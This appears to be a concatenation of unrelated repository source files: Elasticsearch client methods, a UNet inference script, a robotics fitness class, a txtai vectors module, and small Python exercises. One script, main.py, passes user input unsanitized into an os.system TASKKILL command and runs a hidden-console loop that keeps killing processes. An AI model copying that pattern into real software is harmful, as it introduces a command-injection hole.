:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg local: Return local information, do not retrieve the state
from master node (default: false)
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg routing: Specific routing value
"""
return self.transport.perform_request(
"GET", _make_path(index, "_search_shards"), params=params
)
@query_params(
"allow_no_indices",
"expand_wildcards",
"explain",
"ignore_throttled",
"ignore_unavailable",
"preference",
"profile",
"rest_total_hits_as_int",
"routing",
"scroll",
"search_type",
"typed_keys",
)
def search_template(self, body, index=None, doc_type=None, params=None):
"""
Allows to use the Mustache language to pre-render a search definition.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/search-template.html>`_
:arg body: The search definition template and its params
:arg index: A comma-separated list of index names to search; use
`_all` or empty string to perform the operation on all indices
:arg doc_type: A comma-separated list of document types to
search; leave empty to perform the operation on all types
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg explain: Specify whether to return detailed information
about score computation as part of a hit
:arg ignore_throttled: Whether specified concrete, expanded or
aliased indices should be ignored when throttled
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg profile: Specify whether to profile the query execution
:arg rest_total_hits_as_int: Indicates whether hits.total should
be rendered as an integer or an object in the rest search response
:arg routing: A comma-separated list of specific routing values
:arg scroll: Specify how long a consistent view of the index
should be maintained for scrolled search
:arg search_type: Search operation type Valid choices:
query_then_fetch, query_and_fetch, dfs_query_then_fetch,
dfs_query_and_fetch
:arg typed_keys: Specify whether aggregation and suggester names
should be prefixed by their respective types in the response
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request(
"GET",
_make_path(index, doc_type, "_search", "template"),
params=params,
body=body,
)
@query_params(
"field_statistics",
"fields",
"offsets",
"payloads",
"positions",
"preference",
"realtime",
"routing",
"term_statistics",
"version",
"version_type",
)
def termvectors(self, index, body=None, doc_type=None, id=None, params=None):
"""
Returns information and statistics about terms in the fields of a particular
document.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-termvectors.html>`_
:arg index: The index in which the document resides.
:arg body: Define parameters and or supply a document to get
termvectors for. See documentation.
:arg doc_type: The type of the document.
:arg id: The id of the document, when not specified a doc param
should be supplied.
:arg field_statistics: Specifies if document count, sum of
document frequencies and sum of total term frequencies should be
returned. Default: True
:arg fields: A comma-separated list of fields to return.
:arg offsets: Specifies if term offsets should be returned.
Default: True
:arg payloads: Specifies if term payloads should be returned.
Default: True
:arg positions: Specifies if term positions should be returned.
Default: True
:arg preference: Specify the node or shard the operation should
be performed on (default: random).
:arg realtime: Specifies if request is real-time as opposed to
near-real-time (default: true).
:arg routing: Specific routing value.
:arg term_statistics: Specifies if total term frequency and
document frequency should be returned.
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte, force
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'index'.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"GET",
_make_path(index, doc_type, id, "_termvectors"),
params=params,
body=body,
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"if_primary_term",
"if_seq_no",
"lang",
"refresh",
"retry_on_conflict",
"routing",
"timeout",
"wait_for_active_shards",
)
def update(self, index, id, body, doc_type=None, params=None):
"""
Updates a document with a script or partial document.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-update.html>`_
:arg index: The name of the index
:arg id: Document ID
:arg body: The request definition requires either `script` or
partial `doc`
:arg doc_type: The type of the document
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg if_primary_term: only perform the update operation if the
last operation that has changed the document has the specified primary
term
:arg if_seq_no: only perform the update operation if the last
operation that has changed the document has the specified sequence
number
:arg lang: The script language (default: painless)
:arg refresh: If `true` then refresh the effected shards to make
this operation visible to search, if `wait_for` then wait for a refresh
to make this operation visible to search, if `false` (the default) then
do nothing with refreshes. Valid choices: true, false, wait_for
:arg retry_on_conflict: Specify how many times should the
operation be retried when a conflict occurs (default: 0)
:arg routing: Specific routing value
:arg timeout: Explicit operation timeout
:arg wait_for_active_shards: Sets the number of shard copies
that must be active before proceeding with the update operation.
Defaults to 1, meaning the primary shard only. Set to `all` for all
shard copies, otherwise set to any non-negative value less than or equal
to the total number of copies for the shard (number of replicas + 1)
"""
for param in (index, id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"POST", _make_path(index, doc_type, id, "_update"), params=params, body=body
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"allow_no_indices",
"analyze_wildcard",
"analyzer",
"conflicts",
"default_operator",
"df",
"expand_wildcards",
"from_",
"ignore_unavailable",
"lenient",
"max_docs",
"pipeline",
"preference",
"q",
"refresh",
"request_cache",
"requests_per_second",
"routing",
"scroll",
"scroll_size",
"search_timeout",
"search_type",
"size",
"slices",
"sort",
"stats",
"terminate_after",
"timeout",
"version",
"version_type",
"wait_for_active_shards",
"wait_for_completion",
)
def update_by_query(self, index, body=None, doc_type=None, params=None):
"""
Performs an update on every document in the index without changing the source,
for example to pick up a mapping change.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-update-by-query.html>`_
:arg index: A comma-separated list of index names to search; use
`_all` or empty string to perform the operation on all indices
:arg body: The search definition using the Query DSL
:arg doc_type: A comma-separated list of document types to
search; leave empty to perform the operation on all types
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg analyze_wildcard: Specify whether wildcard and prefix
queries should be analyzed (default: false)
:arg analyzer: The analyzer to use for the query string
:arg conflicts: What to do when the update by query hits version
conflicts? Valid choices: abort, proceed Default: abort
:arg default_operator: The default operator for query string
query (AND or OR) Valid choices: AND, OR Default: OR
:arg df: The field to use as default where no field prefix is
given in the query string
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg from_: Starting offset (default: 0)
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg lenient: Specify whether format-based query failures (such
as providing text to a numeric field) should be ignored
:arg max_docs: Maximum number of documents to process (default:
all documents)
:arg pipeline: Ingest pipeline to set on index requests made by
this action. (default: none)
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg q: Query in the Lucene query string syntax
:arg refresh: Should the effected indexes be refreshed?
:arg request_cache: Specify if request cache should be used for
this request or not, defaults to index level setting
:arg requests_per_second: The throttle to set on this request in
sub-requests per second. -1 means no throttle.
:arg routing: A comma-separated list of specific routing values
:arg scroll: Specify how long a consistent view of the index
should be maintained for scrolled search
:arg scroll_size: Size on the scroll request powering the update
by query
:arg search_timeout: Explicit timeout for each search request.
Defaults to no timeout.
:arg search_type: Search operation type Valid choices:
query_then_fetch, dfs_query_then_fetch
:arg size: Deprecated, please use `max_docs` instead
:arg slices: The number of slices this task should be divided
into. Defaults to 1 meaning the task isn't sliced into subtasks.
Default: 1
:arg sort: A comma-separated list of <field>:<direction> pairs
:arg stats: Specific 'tag' of the request for logging and
statistical purposes
:arg terminate_after: The maximum number of documents to collect
for each shard, upon reaching which the query execution will terminate
early.
:arg timeout: Time each individual bulk request should wait for
shards that are unavailable. Default: 1m
:arg version: Specify whether to return document version as part
of a hit
:arg version_type: Should the document increment the version
number (internal) on hit or not (reindex)
:arg wait_for_active_shards: Sets the number of shard copies
that must be active before proceeding with the update by query
operation. Defaults to 1, meaning the primary shard only. Set to `all`
for all shard copies, otherwise set to any non-negative value less than
or equal to the total number of copies for the shard (number of replicas
+ 1)
:arg wait_for_completion: Should the request should block until
the update by query operation is complete. Default: True
"""
# from is a reserved word so it cannot be used, use from_ instead
if "from_" in params:
params["from"] = params.pop("from_")
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'index'.")
return self.transport.perform_request(
"POST",
_make_path(index, doc_type, "_update_by_query"),
params=params,
body=body,
)
@query_params("requests_per_second")
def update_by_query_rethrottle(self, task_id, params=None):
"""
Changes the number of requests per second for a particular Update By Query
operation.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-update-by-query.html>`_
:arg task_id: The task id to rethrottle
:arg requests_per_second: The throttle to set on this request in
floating sub-requests per second. -1 means set no throttle.
"""
if task_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'task_id'.")
return self.transport.perform_request(
"POST",
_make_path("_update_by_query", task_id, "_rethrottle"),
params=params,
)
| [
"hourui@qianmi.com"
] | hourui@qianmi.com |
1e6958f73021d78c7be222fe32a1d093a81b815d | 0e5e3cce9bde498f1bd2d1fcbc46cf69ee36f35c | /inference_color.py | c4c2d35d7ab12c0530d0ed59ea5cc3621ae8616a | [
"Apache-2.0"
] | permissive | ljhclover/pytorch_Unet_CZI | f61d444a16fd70d29a7927541ba3a10a73577241 | 92a3c295077562161d747157fdcba998132d4a94 | refs/heads/main | 2023-03-23T06:03:04.627802 | 2021-03-17T11:23:58 | 2021-03-17T11:23:58 | 348,678,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,215 | py | # -*- coding: utf-8 -*-
# @Time : 2020-09-20 17:44
# @Author : lijinghu
# @Email : ljhclover@hotmail.com
# @File : inference.py
"""
"""
import argparse
import logging
import os
import os.path as osp
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
import numpy as np
import torch
import torch.nn.functional as F
from torchvision import transforms
from PIL import Image
from tqdm import tqdm
import cv2
from unet import NestedUNet
from unet import UNet
from utils.dataset import BasicDataset
from utils.colors import get_colors
from config import UNetConfig
cfg = UNetConfig()
def inference_one(net, image, device):
net.eval()
img = torch.from_numpy(BasicDataset.preprocess(image, cfg.scale))
img = img.unsqueeze(0)
img = img.to(device=device, dtype=torch.float32)
with torch.no_grad():
output = net(img)
if cfg.deepsupervision:
output = output[-1]
if cfg.n_classes > 1:
probs = F.softmax(output, dim=1)
else:
probs = torch.sigmoid(output)
probs = probs.squeeze(0) # C x H x W
tf = transforms.Compose(
[
transforms.ToPILImage(),
transforms.Resize((image.size[1], image.size[0])),
transforms.ToTensor()
]
)
if cfg.n_classes == 1:
probs = tf(probs.cpu())
mask = probs.squeeze().cpu().numpy()
return mask > cfg.out_threshold
else:
masks = []
for prob in probs:
prob = tf(prob.cpu())
mask = prob.squeeze().cpu().numpy()
mask = mask > cfg.out_threshold
masks.append(mask)
return masks
def get_args():
parser = argparse.ArgumentParser(description='Predict masks from input images',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--model', '-m', default='MODEL.pth',
metavar='FILE',
help="Specify the file in which the model is stored")
parser.add_argument('--input', '-i', dest='input', type=str, default='',
help='Directory of input images')
parser.add_argument('--output', '-o', dest='output', type=str, default='',
help='Directory of ouput images')
return parser.parse_args()
if __name__ == "__main__":
args = get_args()
input_imgs = os.listdir(args.input)
net = eval(cfg.model)(cfg)
logging.info("Loading model {}".format(args.model))
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
logging.info(f'Using device {device}')
net.to(device=device)
net.load_state_dict(torch.load(args.model, map_location=device))
logging.info("Model loaded !")
for i, img_name in tqdm(enumerate(input_imgs)):
logging.info("\nPredicting image {} ...".format(img_name))
img_path = osp.join(args.input, img_name)
print(img_name)
img = Image.open(img_path)
mask = inference_one(net=net,
image=img,
device=device)
img_name_no_ext = osp.splitext(img_name)[0]
output_img_dir = osp.join(args.output, img_name_no_ext)
os.makedirs(output_img_dir, exist_ok=True)
if cfg.n_classes == 1:
image_idx = Image.fromarray((mask * 255).astype(np.uint8))
image_idx.save(osp.join(output_img_dir, img_name))
else:
colors = get_colors(n_classes=cfg.n_classes)
w, h = img.size
img_mask = np.zeros([h, w, 3], np.uint8)
for idx in range(0, len(mask)):
image_idx = Image.fromarray((mask[idx] * 255).astype(np.uint8))
array_img = np.asarray(image_idx)
img_mask[np.where(array_img==255)] = colors[idx]
img = cv2.cvtColor(np.asarray(img),cv2.COLOR_RGB2BGR)
img_mask = cv2.cvtColor(np.asarray(img_mask),cv2.COLOR_RGB2BGR)
output = cv2.addWeighted(img, 0.7, img_mask, 0.3, 0)
cv2.imwrite(osp.join(output_img_dir, img_name), output)
| [
"noreply@github.com"
] | noreply@github.com |
f0501c3bc093969d279619ced31bd78ea5fcd12d | a6be7f8c42e6d8033658f559752b79f2dd06b771 | /sutter_hospital/ourdocters/apps.py | 87f1ba62653e12ad79e3ea40fc8a6fda31473137 | [] | no_license | Satwik1112/hospital_website | c14dd872bdfd22323fb955b870cedc4e38418859 | ab10dc3d53cf185d463507e4e9f145721584b0a1 | refs/heads/main | 2023-07-13T02:18:38.184112 | 2021-09-01T17:03:18 | 2021-09-01T17:03:18 | 402,112,873 | 0 | 0 | null | 2021-09-01T17:02:37 | 2021-09-01T15:34:29 | null | UTF-8 | Python | false | false | 158 | py | from django.apps import AppConfig
class OurdoctersConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'ourdocters'
| [
"noreply@github.com"
] | noreply@github.com |
e6e0fd0c21c64460b18b4b981deca3ff29fb54c6 | 19c922ca909820bea23fb1e9a9e3080d044eb826 | /Chinese Phonology/dicts/shijingPartDict.py | 42664f4c2b23854326adf0fc9653262bdbf6d639 | [] | no_license | philneal/Eohan | 49d0465a889788fa272d61eba60b5d5447bb1a68 | 405a91ebf75846bf5b40c83815753508c251433a | refs/heads/master | 2016-09-06T10:54:30.392054 | 2015-06-18T07:39:21 | 2015-06-18T07:39:21 | 37,643,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | (dp0
I0
V\u570b\u98a8\u4e00
p1
sI1
V\u5c0f\u96c5\u4e8c
p2
sI2
V\u5927\u96c5\u4e09
p3
sI3
V\u5468\u980c\u56db\u4e4b\u4e00
p4
s. | [
"philipneal@hotmail.com"
] | philipneal@hotmail.com |
e98221ca4eca525cea8ec9b4a9a867b7f179168a | bb9bee0ee44f63fb81ce3c12080bcfa2552e0a49 | /main.py | 714fb6ff34e735d0feb1eb6d854555e3f74abd06 | [] | no_license | hodgej/python-task-controller | 9fa2cf872f6361c2b1bbf34af8f038947aeff3b3 | 027ca5e08a3e1c46a4dde6e9feffd8427efc8805 | refs/heads/master | 2022-04-26T00:43:36.180036 | 2020-05-03T19:34:30 | 2020-05-03T19:34:30 | 261,006,093 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,475 | py | import os
import subprocess
import time
from threading import Thread
import ctypes
kernel32 = ctypes.WinDLL('kernel32')
user32 = ctypes.WinDLL('user32')
SW_HIDE = 0
hWnd = kernel32.GetConsoleWindow()
def get_tasks(action):
list = os.popen('tasklist').read().strip().split('\n')
if action == "length":
return len(list)
elif action == "list":
return list
else:
raise ValueError("Invalid input to 'get_tasks' on argument 'action'.")
def kill_task(task):
killcmd = r"TASKKILL /F /IM %s" % task
os.system(killcmd)
def recursive_kill(task):
while True:
time.sleep(1)
r = os.popen('tasklist').read().strip().split('\n')
for i in range(len(r)):
if task in r[i]:
kill_task(task)
print("killed")
def home():
e = input("Valid Commands: 'list', 'list_len', 'kill *app*', 'recursive_kill' *app*, 'stop'\n")
d = e.split(" ")
if d[0] == "list":
print(get_tasks("list"))
home()
elif d[0] == "list_len":
print(get_tasks("length"))
home()
elif d[0] == "kill":
kill_task(d[1])
home()
elif d[0] == "recursive_kill":
if hWnd:
user32.ShowWindow(hWnd, SW_HIDE)
for i in d[1].split(" "):
Thread(target=recursive_kill(i)).start()
else:
print("Invalid Input")
home()
home() | [
"noreply@github.com"
] | noreply@github.com |
31016d76561425d939332319e1c3c3f3630350a1 | 5808f74f1825919da58ae91829ff4516623eb79d | /2020/new_python_concepts/02_floats.py | 00d580b96499450bff11db1b8e67cafef9cebf04 | [
"MIT"
] | permissive | hygull/stkovrflw | e2d78c8614b8d9646e3458926d71d13dfa75e2d4 | f341727c7e42b6e667345f12814ab1f2479f1b89 | refs/heads/master | 2023-07-19T11:56:45.818534 | 2022-03-19T18:13:47 | 2022-03-19T18:13:47 | 132,311,923 | 0 | 1 | MIT | 2023-07-16T21:27:08 | 2018-05-06T06:10:14 | Python | UTF-8 | Python | false | false | 254 | py | def func(p1: float, p2: float) -> float:
print(p1 + p2)
# return None
"""
floats.py:3: error: Incompatible return value type (got "None", expected "float")
Found 1 error in 1 file (checked 2 source files)
"""
return p1 + p2
| [
"rishikesh0014051992@gmail.com"
] | rishikesh0014051992@gmail.com |
fb940c955be5b66b7cac6e43e4945aa5f53ec126 | 53deeaa922f10a159bdb6f31f0caed00c5607527 | /robotics/individual.py | a261a1cc5f5c208d42f13f841f0e99081bfd31df | [] | no_license | atbarnes/robotics | 679b95852953dc4193fc6f343c888e99a139b5cf | 4776915559c534977b4ebbb6570cc56ae3c3e44b | refs/heads/master | 2020-06-08T00:06:07.407724 | 2019-06-21T15:45:07 | 2019-06-21T15:45:07 | 193,120,833 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,841 | py | import random
import pyrosim
import math
import numpy
from robot import ROBOT
import constants as c
class INDIVIDUAL:
def __init__(self, i):
self.genome = 2 * numpy.random.random_sample((13, 8)) - 1
self.fitness = 0
self.distanceCar1 = 0
self.distanceCar2 = 0
self.progress1 = 0
self.progress2 = 0
self.ID = i
def Start_Evaluation(self, env, pp, pb):
self.sim = pyrosim.Simulator(play_blind = pb, play_paused = pp, eval_time = c.evalTime)
self.robot = ROBOT(self.sim, self.genome)
env.Send_To(self.sim)
self.sim.start()
def Compute_Fitness(self):
self.sim.wait_to_finish()
t = 0
#object positions
x1 = self.sim.get_sensor_data( sensor_id = self.robot.L4, svi=0)
y1 = self.sim.get_sensor_data( sensor_id = self.robot.L4, svi=1)
x2 = self.sim.get_sensor_data( sensor_id = self.robot.L5, svi=0)
y2 = self.sim.get_sensor_data( sensor_id = self.robot.L5, svi=1)
#car positions
x3 = self.sim.get_sensor_data( sensor_id = self.robot.L6, svi=0)
y3 = self.sim.get_sensor_data( sensor_id = self.robot.L6, svi=1)
x4 = self.sim.get_sensor_data( sensor_id = self.robot.L7, svi=0)
y4 = self.sim.get_sensor_data( sensor_id = self.robot.L7, svi=1)
light = self.sim.get_sensor_data( sensor_id = self.robot.L8)
#first time step
xval = x1[0]
yval = y1[0]
x2val = x2[0]
y2val = y2[0]
x3val = x3[0]
y3val = y3[0]
x4val = x4[0]
y4val = y4[0]
#last time step
xval2 = x1[-1]
yval2 = y1[-1]
x2val2 = x2[-1]
y2val2 = y2[-1]
x3val2 = x3[-1]
y3val2 = y3[-1]
x4val2 = x4[-1]
y4val2 = y4[-1]
#calculate distance
distance1 = math.sqrt( (x3val - xval)**2 + (y3val - yval)**2 )
distance2 = math.sqrt( (x4val - x2val)**2 + (y4val - y2val)**2 )
distance3 = math.sqrt( (x3val2 - xval2)**2 + (y3val2 - yval2)**2 )
distance4 = math.sqrt( (x4val2 - x2val2)**2 + (y4val2 - y2val2)**2 )
#find if car made progress from last time step
self.distanceCar1 = distance1 - distance3
self.distanceCar2 = distance2 - distance4
#Difference in progress between both cars
offset = abs(self.distanceCar1 - self.distanceCar2)
#If difference is below one, just make it one
if (offset < 1):
offset = 1
if (self.distanceCar1 < 0 and self.distanceCar2 < 0):
self.fitness = 0
#if one car isn't making progress, make offset high
#if (self.distanceCar1 < 0 or self.distanceCar2 < 0):
#offset = 10
else:
self.fitness = ((self.distanceCar1 * self.distanceCar2)/offset) * light[-1]
output = ('fitness:{: 3.3f}, d:{: 3.3f}, light:{: 3.1f}, offset:{: 3.1f}').format(self.fitness, self.distanceCar1, light[-1], offset)
output2 = ('fitness:{: 3.3f},d:{: 3.3f}, light:{: 3.1f}, offset:{: 3.1f}').format(self.fitness, self.distanceCar2, light[-1], offset)
print output + "\n"
print output2 + "\n"
#for t in range(c.evalTime):
#object positions
#x1 = self.sim.get_sensor_data( sensor_id = self.robot.L4, svi=0)
#y1 = self.sim.get_sensor_data( sensor_id = self.robot.L4, svi=1)
#x2 = self.sim.get_sensor_data( sensor_id = self.robot.L5, svi=0)
#y2 = self.sim.get_sensor_data( sensor_id = self.robot.L5, svi=1)
#car positions
#x3 = self.sim.get_sensor_data( sensor_id = self.robot.L6, svi=0)
#y3 = self.sim.get_sensor_data( sensor_id = self.robot.L6, svi=1)
#x4 = self.sim.get_sensor_data( sensor_id = self.robot.L7, svi=0)
#y4 = self.sim.get_sensor_data( sensor_id = self.robot.L7, svi=1)
#light = self.sim.get_sensor_data( sensor_id = self.robot.L8)
#this time step
#xval = x1[t]
#yval = y1[t]
#x2val = x2[t]
#y2val = y2[t]
#x3val = x3[t]
#y3val = y3[t]
#x4val = x4[t]
#y4val = y4[t]
#next time step
#if(t != c.evalTime - 1):
#xval2 = x1[t+1]
#yval2 = y1[t+1]
#x2val2 = x2[t+1]
#y2val2 = y2[t+1]
#x3val2 = x3[t+1]
#y3val2 = y3[t+1]
#x4val2 = x4[t+1]
#y4val2 = y4[t+1]
#calculate distance for each time step
#distance1 = math.sqrt( (x3val - xval)**2 + (y3val - yval)**2 )
#distance2 = math.sqrt( (x4val - x2val)**2 + (y4val - y2val)**2 )
#distance3 = math.sqrt( (x3val2 - xval2)**2 + (y3val2 - yval2)**2 )
#distance4 = math.sqrt( (x4val2 - x2val2)**2 + (y4val2 - y2val2)**2 )
#find if car made progress from last time step
#self.distanceCar1 += (distance1 - distance3)
#self.distanceCar2 += (distance2 - distance4)
#if(distance1 - distance3 > 0):
#self.progress1 += 1
#if(distance2 - distance4 > 0):
#self.progress2 += 1
#output = ('Distance 1: {:3d}:: d:{: 3.3f}, progress:{: 3.1f}, light:{: 3.1f}').format(t, self.distanceCar1, self.progress1, light[-1])
#output2 = ('Distance 2: {:3d}:: d:{: 3.3f}, progress:{: 3.1f}, light:{: 3.1f}').format(t, self.distanceCar2, self.progress2, light[-1])
#output = ('Object 1: {:3d}:: x:{: 3.1f}, y:{: 3.1f},').format(t, xval, yval)
#output2 = ('Object 2:{:3d}:: x:{: 3.1f}, y:{: 3.1f},').format(t, x2val, y2val)
#output3 = ('Car 1:{:3d}:: x:{: 3.1f}, y:{: 3.1f},').format(t, x3val, y3val)
#output4 = ('Car 2:{:3d}:: x:{: 3.1f}, y:{: 3.1f},').format(t, x4val, y4val)
#print output + "\n"
#print output2 + "\n"
#print output3 + "\n"
#print output4 + "\n"
#self.fitness = (self.distanceCar1 + self.distanceCar2) * light[-1] * 1/
del self.sim
del self.robot
def Mutate(self):
geneToMutate = random.randint(0, 9)
geneToMutate2 = random.randint(0, 7)
self.genome[geneToMutate][geneToMutate2] = abs(random.gauss(self.genome[geneToMutate][geneToMutate2], math.fabs(self.genome[geneToMutate][geneToMutate2])))
if(self.genome[geneToMutate][geneToMutate2] > 1):
self.genome[geneToMutate][geneToMutate2] = 1
if(self.genome[geneToMutate][geneToMutate2] < -1):
self.genome[geneToMutate][geneToMutate2] = -1
def Print(self):
print(" ["),
print(self.ID),
print(self.fitness),
print("] "),
print()
| [
"noreply@github.com"
] | noreply@github.com |
d741cbbed408cd89eba80b859cd1b82ff07f0c56 | 5f364b328d0e7df6f292dbbec266995f495b2ed4 | /src/python/txtai/vectors/words.py | 1cac062ec92c54e5a3ac71630cd7282b202a50b2 | [
"Apache-2.0"
] | permissive | binglinchengxiash/txtai | a17553f57ddd857ff39a7d0b38e24930f5c71596 | 1513eb8390f01848742e67690b6e4bc6452101ee | refs/heads/master | 2023-04-03T18:59:35.845281 | 2021-04-05T22:05:15 | 2021-04-05T22:05:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,715 | py | """
Word Vectors module
"""
import os
import pickle
import tempfile
from errno import ENOENT
from multiprocessing import Pool
import fasttext
import numpy as np
from pymagnitude import converter, Magnitude
from .base import Vectors
from ..pipeline.tokenizer import Tokenizer
# Multiprocessing helper methods
# pylint: disable=W0603
VECTORS = None
def create(config, scoring):
"""
Multiprocessing helper method. Creates a global embeddings object to be accessed in a new subprocess.
Args:
config: vector configuration
scoring: scoring instance
"""
global VECTORS
# Create a global embedding object using configuration and saved
VECTORS = WordVectors(config, scoring)
def transform(document):
"""
Multiprocessing helper method. Transforms document into an embeddings vector.
Args:
document: (id, text|tokens, tags)
Returns:
(id, embedding)
"""
global VECTORS
return (document[0], VECTORS.transform(document))
class WordVectors(Vectors):
"""
Builds sentence embeddings/vectors using weighted word embeddings.
"""
def load(self, path):
# Ensure that vector path exists
if not path or not os.path.isfile(path):
raise IOError(ENOENT, "Vector model file not found", path)
# Load magnitude model. If this is a training run (uninitialized config), block until vectors are fully loaded
return Magnitude(path, case_insensitive=True, blocking=not self.initialized)
def index(self, documents):
ids, dimensions, stream = [], None, None
# Shared objects with Pool
args = (self.config, self.scoring)
# Convert all documents to embedding arrays, stream embeddings to disk to control memory usage
with Pool(os.cpu_count(), initializer=create, initargs=args) as pool:
with tempfile.NamedTemporaryFile(mode="wb", suffix=".npy", delete=False) as output:
stream = output.name
for uid, embedding in pool.imap(transform, documents):
if not dimensions:
# Set number of dimensions for embeddings
dimensions = embedding.shape[0]
ids.append(uid)
pickle.dump(embedding, output)
return (ids, dimensions, stream)
def transform(self, document):
# Convert to tokens if necessary
if isinstance(document[1], str):
document = (document[0], Tokenizer.tokenize(document[1]), document[2])
# Generate weights for each vector using a scoring method
weights = self.scoring.weights(document) if self.scoring else None
# pylint: disable=E1133
if weights and [x for x in weights if x > 0]:
# Build weighted average embeddings vector. Create weights array os float32 to match embeddings precision.
embedding = np.average(self.lookup(document[1]), weights=np.array(weights, dtype=np.float32), axis=0)
else:
# If no weights, use mean
embedding = np.mean(self.lookup(document[1]), axis=0)
return embedding
def lookup(self, tokens):
"""
Queries word vectors for given list of input tokens.
Args:
tokens: list of tokens to query
Returns:
word vectors array
"""
return self.model.query(tokens)
@staticmethod
def build(data, size, mincount, path):
"""
Builds fastText vectors from a file.
Args:
data: path to input data file
size: number of vector dimensions
mincount: minimum number of occurrences required to register a token
path: path to output file
"""
# Train on data file using largest dimension size
model = fasttext.train_unsupervised(data, dim=size, minCount=mincount)
# Output file path
print("Building %d dimension model" % size)
# Output vectors in vec/txt format
with open(path + ".txt", "w") as output:
words = model.get_words()
output.write("%d %d\n" % (len(words), model.get_dimension()))
for word in words:
# Skip end of line token
if word != "</s>":
vector = model.get_word_vector(word)
data = ""
for v in vector:
data += " " + str(v)
output.write(word + data + "\n")
# Build magnitude vectors database
print("Converting vectors to magnitude format")
converter.convert(path + ".txt", path + ".magnitude", subword=True)
| [
"561939+davidmezzetti@users.noreply.github.com"
] | 561939+davidmezzetti@users.noreply.github.com |
97bbcc71aed4955b72792b40e69e7770f3c2f305 | c097e75cb898d5702d8ea966ec33ec27ca3619aa | /14pythonic/None_1406.py | 5a5659f313b2bc8b5e07a90de30ca660a7ae2213 | [
"MIT"
] | permissive | FrancisJen/pythonic | 2788d23c4244c7fb3a5e182bde083c5f72dfe11f | d26d09a6114b610ae998297756faf96df87b2bea | refs/heads/master | 2020-05-09T17:28:42.241939 | 2019-04-21T14:32:22 | 2019-04-21T14:32:22 | 181,311,186 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 156 | py | # 14-6 None
# []
# ''
# False
# None
# 是四种type,而且value也不同
# 如何进行判空, 不用用None来进行判空
# if a:
# if not a: | [
"renyiguang@gclsi.com"
] | renyiguang@gclsi.com |
33a0d657f9629c3131a0277e8a8ccea77f4364b4 | c7a6c8b8c8a0bb5e7d5dc99a79dd205e6807f990 | /pythonteste/Aula21.2.py | f4b33cdd55c783d95efa68abba847451e49e1c76 | [
"MIT"
] | permissive | RodrigoPasini/PYTHON | eaf487f0a86e0d1bf9aadcb4c38036a6c97ba4fb | e114390091fedb03bf25a56a671da6186d6bfcae | refs/heads/main | 2023-02-23T20:28:29.057750 | 2021-01-22T14:11:35 | 2021-01-22T14:11:35 | 319,797,371 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 488 | py | '''PARÂMETROS OPCIONAIS'''
def somar(a=0,b=0,c=0):
s=a+b+c
print(f"A soma dos valors {a}+{b}+{c}={s}")
somar(3,2,5)
somar(8,4)
'''ESCOPO DE VARIÁVEIS'''
def teste():
x=8 #variável LOCAL
print(f"Na função teste, n vale {n}")
print(f"Na função teste, x vale {x}")
#PROGRAMA PRINCIPAL
n=2 #variável GLOBAL
print(f"No programa principal n vale {n}")
teste()
print(f"No programa principal, x vale {x}") # erro pq se trata de uma variável LOCAL fora da função | [
"65973007+RodrigoPasini@users.noreply.github.com"
] | 65973007+RodrigoPasini@users.noreply.github.com |
